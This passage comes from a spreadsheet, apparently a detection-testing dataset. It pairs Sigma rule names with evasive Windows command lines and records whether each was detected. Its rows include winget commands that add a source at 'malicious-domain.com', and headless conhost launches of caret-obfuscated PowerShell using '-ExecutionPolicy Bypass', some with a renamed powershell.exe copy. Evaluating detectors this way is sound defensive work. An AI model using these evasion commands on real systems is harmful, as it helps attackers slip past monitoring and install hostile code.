        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1181" s="36" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1181" s="36" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1181" s="36" t="inlineStr">
        <is>
          <t>winget source add --no-deps evadesource --accept-source-arms https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1181" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1181" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1181" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1181" s="43" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1181" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1181" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1182" ht="15.75" customHeight="1" s="42">
      <c r="A1182" s="36" t="n"/>
      <c r="B1182" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1182" s="36" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1182" s="36" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1182" s="36" t="inlineStr">
        <is>
          <t>winget source add /"n" evadesource -a https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1182" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1182" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1182" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1182" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1182" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1182" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1183" ht="15.75" customHeight="1" s="42">
      <c r="A1183" s="36" t="n"/>
      <c r="B1183" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1183" s="36" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1183" s="36" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1183" s="36" t="inlineStr">
        <is>
          <t>winget source add -"n" evadesource --accept-source-arms https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1183" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1183" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1183" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1183" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1183" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1183" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1184" ht="15.75" customHeight="1" s="42">
      <c r="A1184" s="36" t="n"/>
      <c r="B1184" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1184" s="36" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1184" s="36" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1184" s="36" t="inlineStr">
        <is>
          <t>winget source add -"n" evadesource -a https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1184" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1184" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1184" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1184" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1184" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1184" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1185" ht="15.75" customHeight="1" s="42">
      <c r="A1185" s="36" t="n"/>
      <c r="B1185" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_winget_add_susp_custom_source</t>
        </is>
      </c>
      <c r="C1185" s="36" t="inlineStr">
        <is>
          <t>Add Potential Suspicious New Download Source To Winget</t>
        </is>
      </c>
      <c r="D1185" s="36" t="inlineStr">
        <is>
          <t>c15a46a0-07d4-4c87-b4b6-89207835a83b</t>
        </is>
      </c>
      <c r="E1185" s="36" t="inlineStr">
        <is>
          <t>winget source add -N evadesource -"a" https://malicious-domain.com/winget</t>
        </is>
      </c>
      <c r="F1185" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1185" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1185" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1185" s="36" t="inlineStr">
        <is>
          <t>Add New Download Source To Winget (05ebafc8-7aa2-4bcd-a269-2aec93f9e842)</t>
        </is>
      </c>
      <c r="J1185" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1185" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1186" ht="15.75" customHeight="1" s="42">
      <c r="A1186" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1186" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1186" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1186" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1186" s="36" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "C:\Windows\System32\WindowsPowerShell\v1.0\pwsh.exe -Command Write-Host 'Bypassed'"</t>
        </is>
      </c>
      <c r="F1186" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1186" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1186" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1186" s="36" t="n"/>
      <c r="J1186" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1186" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1187" ht="15.75" customHeight="1" s="42">
      <c r="A1187" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1187" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1187" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1187" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1187" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --headless "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1187" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1187" s="36" t="n"/>
      <c r="J1187" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1187" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1188" ht="15.75" customHeight="1" s="42">
      <c r="A1188" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1188" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1188" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1188" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1188" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --heADLEss "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1188" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1188" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1188" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1188" s="36" t="n"/>
      <c r="J1188" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1188" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1189" ht="15.75" customHeight="1" s="42">
      <c r="A1189" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1189" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1189" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1189" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1189" s="36" t="inlineStr">
        <is>
          <t>conhost.exe -"-headless" "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1189" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1189" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1189" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1189" s="36" t="n"/>
      <c r="J1189" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1189" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1190" ht="15.75" customHeight="1" s="42">
      <c r="A1190" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1190" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1190" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1190" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1190" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLESs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1190" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1190" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1190" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1190" s="43" t="n"/>
      <c r="J1190" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1190" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1191" ht="15.75" customHeight="1" s="42">
      <c r="A1191" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1191" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1191" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1191" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1191" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --hEadLeSs "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1191" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1191" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1191" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1191" s="43" t="n"/>
      <c r="J1191" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1191" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1192" ht="15.75" customHeight="1" s="42">
      <c r="A1192" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1192" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1192" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1192" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1192" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdlesS "p^o^w^e^r^s^h^e^l^l -ExecutionPolicy Bypass -File C:\script.ps1"</t>
        </is>
      </c>
      <c r="F1192" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1192" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1192" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1192" s="43" t="n"/>
      <c r="J1192" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1192" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1193" ht="15.75" customHeight="1" s="42">
      <c r="A1193" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1193" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1193" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1193" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1193" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F1193" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1193" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1193" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1193" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1193" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1193" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1194" ht="15.75" customHeight="1" s="42">
      <c r="A1194" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1194" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1194" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1194" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1194" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --heADLEsS not_ps.exe -CommaND Get-Process</t>
        </is>
      </c>
      <c r="F1194" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1194" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1194" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1194" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1194" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1194" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1195" ht="15.75" customHeight="1" s="42">
      <c r="A1195" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1195" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1195" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1195" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1195" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLeSs not_ps.exe -COMMAnd Get-Process</t>
        </is>
      </c>
      <c r="F1195" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1195" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1195" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1195" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1195" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1195" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1196" ht="15.75" customHeight="1" s="42">
      <c r="A1196" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1196" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1196" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1196" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1196" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headLESs not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F1196" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1196" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1196" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1196" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1196" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1196" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1197" ht="15.75" customHeight="1" s="42">
      <c r="A1197" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1197" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1197" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1197" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1197" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe /"-headless" not_ps.exe -COmMANd Get-Process</t>
        </is>
      </c>
      <c r="F1197" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1197" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1197" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1197" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1197" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1197" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1198" ht="15.75" customHeight="1" s="42">
      <c r="A1198" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1198" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1198" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1198" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1198" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmmaNd Get-Process</t>
        </is>
      </c>
      <c r="F1198" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1198" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1198" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1198" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1198" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1198" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1199" ht="15.75" customHeight="1" s="42">
      <c r="A1199" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1199" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1199" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1199" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1199" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -Command Get-Process</t>
        </is>
      </c>
      <c r="F1199" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1199" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1199" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1199" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1199" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1199" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1200" ht="15.75" customHeight="1" s="42">
      <c r="A1200" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1200" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1200" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1200" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1200" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe -"-headless" not_ps.exe -comManD Get-Process</t>
        </is>
      </c>
      <c r="F1200" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1200" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1200" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1200" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1200" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1200" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1201" ht="15.75" customHeight="1" s="42">
      <c r="A1201" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1201" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1201" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1201" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1201" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -cOmMaND Get-Process</t>
        </is>
      </c>
      <c r="F1201" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1201" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1201" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1201" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1201" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1201" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1202" ht="15.75" customHeight="1" s="42">
      <c r="A1202" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1202" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1202" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1202" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1202" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Public\not_ps.exe &amp;&amp; conhost.exe --headless not_ps.exe -"Command" Get-Process</t>
        </is>
      </c>
      <c r="F1202" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1202" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1202" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1202" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1202" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1202" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1203" ht="15.75" customHeight="1" s="42">
      <c r="A1203" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1203" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1203" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1203" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1203" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --headless pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1203" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1203" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1203" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1203" s="36" t="n"/>
      <c r="J1203" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1203" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1204" ht="15.75" customHeight="1" s="42">
      <c r="A1204" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1204" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1204" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1204" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1204" s="36" t="inlineStr">
        <is>
          <t>conhost.exe /"-headless" pwsh.exe -COmMANd "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1204" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1204" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1204" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1204" s="36" t="n"/>
      <c r="J1204" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1204" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1205" ht="15.75" customHeight="1" s="42">
      <c r="A1205" s="36" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1205" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
      <c r="C1205" s="36" t="inlineStr">
        <is>
          <t>Powershell Executed From Headless ConHost Process</t>
        </is>
      </c>
      <c r="D1205" s="36" t="inlineStr">
        <is>
          <t>056c7317-9a09-4bd4-9067-d051312752ea</t>
        </is>
      </c>
      <c r="E1205" s="36" t="inlineStr">
        <is>
          <t>conhost.exe --HeAdleSS pwsh.exe -Command "Write-Host 'Simulated Bypass'"</t>
        </is>
      </c>
      <c r="F1205" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1205" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1205" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1205" s="36" t="n"/>
      <c r="J1205" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1205" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1206" ht="15.75" customHeight="1" s="42">
      <c r="A1206" s="43" t="inlineStr">
        <is>
          <t>t1059.001</t>
        </is>
      </c>
      <c r="B1206" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_conhost_headless_powershell</t>
        </is>
      </c>
